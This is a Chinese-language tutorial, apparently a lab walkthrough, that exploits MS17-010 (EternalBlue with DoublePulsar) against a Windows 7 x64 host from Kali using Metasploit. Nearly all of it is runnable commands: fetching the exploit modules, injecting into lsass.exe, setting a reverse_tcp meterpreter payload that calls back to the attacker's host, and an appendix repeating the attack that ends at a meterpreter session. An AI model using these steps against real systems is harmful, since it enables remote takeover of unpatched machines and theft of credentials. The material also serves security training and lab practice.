本次用到的環境:
kali(2016.2)32位系統.ip地址:192.168.1.104
目標靶機為:win7sp1x64系統(關閉防火牆),ip地址:192.168.1.105
具體的步驟如下:
kali系統下安裝wine32:
apt-get install wine32
用wine32執行cmd.exe
wine cmd.exe
exit //退出
git clone下載其利用腳本:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
然后將腳本拷貝到 /usr/share/metasploit-framework/modules/exploits/windows/smb
cd Eternalblue-Doublepulsar-Metasploit/ cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
啟動msf,然后進行一系列設置:
service postgresql start
msfconsole
search eternalblue
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps set PROCESSINJECT lsass.exe set TARGETARCHITECTURE x64 set rhost 192.168.1.105 show targets set target 9
set payload windows/x64/meterpreter/reverse_tcp show options set lhost 192.168.1.104 exploit
附錄:
msf下的ms17-010模塊:
前提條件:
1. gem install ruby_smb #ruby_smb模塊安裝
2.msfupdate #msf的更新
3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue" #啟動並加載模塊
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb Use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8 msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21 msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp msf exploit(ms17_010_eternalblue) >exploit Meterpreter> sysinfo
